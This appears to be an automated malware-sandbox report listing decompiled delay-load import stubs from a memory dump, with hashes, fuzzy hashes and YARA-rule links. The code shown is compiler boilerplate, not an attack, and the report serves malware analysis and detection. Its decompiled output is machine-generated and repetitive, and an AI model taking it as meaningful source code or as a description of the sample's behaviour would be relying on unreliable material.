API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7cbecfbef1fa3d6431328934cd72e3efc9c591c58a19a30e35dbcdbac6993339
Instruction ID: 93fef710f6da313498f2948f73a7abee066886e522c8c01b38a4a669b72cda40
Opcode Fuzzy Hash: 7cbecfbef1fa3d6431328934cd72e3efc9c591c58a19a30e35dbcdbac6993339
Instruction Fuzzy Hash: D7B0129166C0056D320C61457F42E36027CCCD0B10334C02EF00EE02C0D7909C0F1432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D8F2, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D8F2() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2144); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e9ecdb701fe09a62ae8f05104a6121839c62b7e30a197de2adc26c96f1dd10fa
Instruction ID: 12ee333c14c553f325fcab28e0a6afe093074caa646cb1c73b9a254b54bee4e8
Opcode Fuzzy Hash: e9ecdb701fe09a62ae8f05104a6121839c62b7e30a197de2adc26c96f1dd10fa
Instruction Fuzzy Hash: 23B012A166C0056D320C61457F42E36027CCCD0B10330C01EF00EE01C0D7809D060432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D8FC, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D8FC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2140); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 791e9f59373db27c81ae724cc6597ab69475c142786b2e22490ca56e9aefe699
Instruction ID: fd0b6de71be0355e150e34dee796d857cbf14e19fdecdfc5d5318e991c7f112f
Opcode Fuzzy Hash: 791e9f59373db27c81ae724cc6597ab69475c142786b2e22490ca56e9aefe699
Instruction Fuzzy Hash: 30B012A166C0056D320C61457E42E36027CCCD0B10330C01EF00EE01C0DB409C050432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D8E8, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D8E8() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2148); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 286bc81b32bc0ddd78d8c47c0ef939ff18c1b66fcf610cf6c8703053802a54d2
Instruction ID: 15c998dfe36926cbd4e1fdc039fbc910e6cd32d8e0513370187b8adda06f2beb
Opcode Fuzzy Hash: 286bc81b32bc0ddd78d8c47c0ef939ff18c1b66fcf610cf6c8703053802a54d2
Instruction Fuzzy Hash: DFB012A166C1056D324C61447E42E36027CCCD0B10331C11EF00EE01C0D7409C450432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D910, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D910() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2138); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eeabe62193adfaf988093711025ba1632b95dd61b44ad91906f7c6a36326f313
Instruction ID: 6e83da6ad252e037ce5a80c8927a0a86d00dda0420f3d53308e11559a19e77eb
Opcode Fuzzy Hash: eeabe62193adfaf988093711025ba1632b95dd61b44ad91906f7c6a36326f313
Instruction Fuzzy Hash: 67B012A166D1056D324C62447E42E36027DCCD0F10331C11EF00EE01C0D740DC450432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D906, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D906() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c213c); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d12f04e922d80ffbe2ab190ca06a62d7d069f491439738087d8598c1bd361a1f
Instruction ID: 13a37a3b5aea94bbbadbb6ad9987db0856cc98fd38446d99fd1104d10c8de2fe
Opcode Fuzzy Hash: d12f04e922d80ffbe2ab190ca06a62d7d069f491439738087d8598c1bd361a1f
Instruction Fuzzy Hash: 19B012916AD1056D320C61447E42E36027DCCD1F10330C01EF40EE01C0D7409C050432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D924, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D924() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2130); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 74bb385d74a1e41607a4b530ee8425bed52ec9ec8e7e3ba3c1f616c5a8bc7311
Instruction ID: 956e9c28b9537a75fff8bf0a0eb2e6be161df5dc73d1369463ada135ef0fbc3d
Opcode Fuzzy Hash: 74bb385d74a1e41607a4b530ee8425bed52ec9ec8e7e3ba3c1f616c5a8bc7311
Instruction Fuzzy Hash: EBB0129167D4056D320C61447E42E3602BDCCD0F10330C01EF00EE01C0DB409C050432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D92E, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D92E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c212c); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3cc51e781b7d5a0271f74f1da8f2478531b3e8e5dac8e5d24900fd7a50b3ddc9
Instruction ID: ff673f99a71100002668e074185c5f142da9c74ea074adf73400e8d82ab3646d
Opcode Fuzzy Hash: 3cc51e781b7d5a0271f74f1da8f2478531b3e8e5dac8e5d24900fd7a50b3ddc9
Instruction Fuzzy Hash: CBB012D166C1056D320C61547E42E3602BCCCD2B10331C01EF50EE01C0D7409C050432

Uniqueness

Uniqueness Score: -1.00%

Function 0017D942, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017D942() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bdc4, 0x1c2124); // executed
				goto __eax;
			}

0x0017d89b
0x0017d8a3
0x0017d8aa

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017D8A3

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bd474eadb62496c403b341a979288521bbec40e1baaff6ee0f5cd082505de1fb
Instruction ID: b26f17e39892274a25573c8a3c415cf79ec0b6134bf91571ba72b177cc108bd9
Opcode Fuzzy Hash: bd474eadb62496c403b341a979288521bbec40e1baaff6ee0f5cd082505de1fb
Instruction Fuzzy Hash: FEB012E166C0056D320C61457F42E3602FCCCD1B10330C01EF00EE01C0D7809C060432

Uniqueness

Uniqueness Score: -1.00%

Function 0017E1F9, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017E1F9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bea4, 0x1c2034); // executed
				goto __eax;
			}

0x0017e203
0x0017e20b
0x0017e212

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017E20B

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8b9f0a47699c32814c73179ad3d9f717132c4d94b55d9ef2460cad16f3525157
Instruction ID: 81b58c8146587397d78011ccc0f3200e2d83d0b6fb5056c37e1f65ad1dabd999
Opcode Fuzzy Hash: 8b9f0a47699c32814c73179ad3d9f717132c4d94b55d9ef2460cad16f3525157
Instruction Fuzzy Hash: D5B0129126E0017E320C11007F06D37037CC9D0F50330C01FF10EE4081D7808C064032

Uniqueness

Uniqueness Score: -1.00%

Function 0017DAD9, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DAD9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bde4, 0x1c2050); // executed
				goto __eax;
			}

0x0017daaa
0x0017dab2
0x0017dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DAB2

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 040ea66a1ae26a81a293d65a3698295a8023504679f1d6b96cb421b98936a997
Instruction ID: 960d13983dc1faace4f589111d2daf6f8b2f79a9af3154938c96f4bdf7c2f946
Opcode Fuzzy Hash: 040ea66a1ae26a81a293d65a3698295a8023504679f1d6b96cb421b98936a997
Instruction Fuzzy Hash: 42B0129126C0056D310C71457F02F3E02BCD8D4B10330C52FF00FD1044DB409C0A4432

Uniqueness

Uniqueness Score: -1.00%

Function 0017DACF, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DACF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bde4, 0x1c204c); // executed
				goto __eax;
			}

0x0017daaa
0x0017dab2
0x0017dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DAB2

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3cfbe2818467807245ebd502424776c9d3246e63e6f6ce5592f5e71940847220
Instruction ID: f77d63e9212708c5fc8907c1bc60299092c62e3906783582402e4e81f591980a
Opcode Fuzzy Hash: 3cfbe2818467807245ebd502424776c9d3246e63e6f6ce5592f5e71940847220
Instruction Fuzzy Hash: C0B012A226C105AD310C71457F02E3A02BCC8D0B10330C11FF40ED1044D7449D054432

Uniqueness

Uniqueness Score: -1.00%

Function 0017DB01, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DB01() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19bde4, 0x1c2060); // executed
				goto __eax;
			}

0x0017daaa
0x0017dab2
0x0017dab9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DAB2

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b94015f4179e8a5f41ac78b26f9954872d36350646dd60ac110ace00749e791a
Instruction ID: fcb9f0d129e4006eb8f77f0576a22273dab9b6a358048449b17417d74dac16da
Opcode Fuzzy Hash: b94015f4179e8a5f41ac78b26f9954872d36350646dd60ac110ace00749e791a
Instruction Fuzzy Hash: 4CB012D12AC1096D710C71457F42F3A02BCE8D0B10330C11FF40ED1044DB409C054532

Uniqueness

Uniqueness Score: -1.00%

Function 0017DBDE, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DBDE() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19be44, 0x1c2090); // executed
				goto __eax;
			}

0x0017dbcd
0x0017dbd5
0x0017dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DBD5

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ad0fa2038d0d890bcc0620d80dafe9998f5b9cff2d2eca79910f90a82e836659
Instruction ID: ad754f16459f1d954719b48c0d1088bf75767cb3c0e70fb12822fbbdd748d519
Opcode Fuzzy Hash: ad0fa2038d0d890bcc0620d80dafe9998f5b9cff2d2eca79910f90a82e836659
Instruction Fuzzy Hash: A7B0129536C0096E710C61143E07F36023DD8D0F10371C02FF00FD1040DF508C094031

Uniqueness

Uniqueness Score: -1.00%

Function 0017DBC3, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DBC3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19be44, 0x1c2088); // executed
				goto __eax;
			}

0x0017dbcd
0x0017dbd5
0x0017dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DBD5

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3476f9ef5ab22702f21dca40d2cbe5fe4096d38f23f37474dc3373b78f3caad7
Instruction ID: e72797579b5f2184880d17f359c52a2277d572046514b45315a7122514e7db65
Opcode Fuzzy Hash: 3476f9ef5ab22702f21dca40d2cbe5fe4096d38f23f37474dc3373b78f3caad7
Instruction Fuzzy Hash: 06B0929526C10A6E620811003E06D36023CD890B10371812EF00EA00409B908C494031

Uniqueness

Uniqueness Score: -1.00%

Function 0017DBFC, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DBFC() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19be44, 0x1c2084); // executed
				goto __eax;
			}

0x0017dbcd
0x0017dbd5
0x0017dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DBD5

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f2e3705e30404d85aa7910170ec415cbad0520660c0f2862be535a3fa19715c4
Instruction ID: 6b699d0e2cd3b99aa1d7797766f638ef638ab4c4fdf3f0a29f78135665e7a19a
Opcode Fuzzy Hash: f2e3705e30404d85aa7910170ec415cbad0520660c0f2862be535a3fa19715c4
Instruction Fuzzy Hash: 92B0929526C00A6E610C51043A06E36023CC890B10371C01EF10ED1040DB908C064031

Uniqueness

Uniqueness Score: -1.00%

Function 0017DBE8, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0017DBE8() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E0017DF59(_t3, _t4, _t8, _t9, _t10, 0x19be44, 0x1c208c); // executed
				goto __eax;
			}

0x0017dbcd
0x0017dbd5
0x0017dbdc

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0017DBD5

Part of subcall function 0017DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0017DFD6
Part of subcall function 0017DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0017DFE7

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
